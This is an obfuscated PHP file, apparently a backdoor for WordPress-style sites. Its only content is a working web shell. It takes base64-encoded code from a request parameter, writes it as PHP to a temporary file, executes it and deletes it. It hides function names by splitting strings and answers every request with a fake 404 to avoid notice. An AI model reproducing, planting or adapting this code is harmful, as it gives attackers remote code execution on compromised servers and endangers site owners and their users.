<?php
try{
$p74dce=array('base64_deco'.'de','sys_ge'.'t_temp_dir','te'.'mpnam','array_key_'.'exists','un'.'link','fi'.'le_put_contents');
$q04e3e='617b7'.'3ee';
if($p74dce[3]($q04e3e,$_POST)){
$y02a39=$p74dce[0]($_POST[$q04e3e]);
}elseif($p74dce[3]($q04e3e,$_GET)){
$y02a39=$p74dce[0]($_GET[$q04e3e]);
}else{$y02a39=null;}
if($y02a39){
$rbfc09=$p74dce[2]($p74dce[1](),'w'.'p_');
if($rbfc09){
$p74dce[5]($rbfc09,'<'.'?ph'.'p '.$y02a39);
http_response_code(404);
@include_once($rbfc09);
@$p74dce[4]($rbfc09);
}}
http_response_code(404);
}catch(Throwable $e){http_response_code(404);}catch(Exception $e){http_response_code(404);}
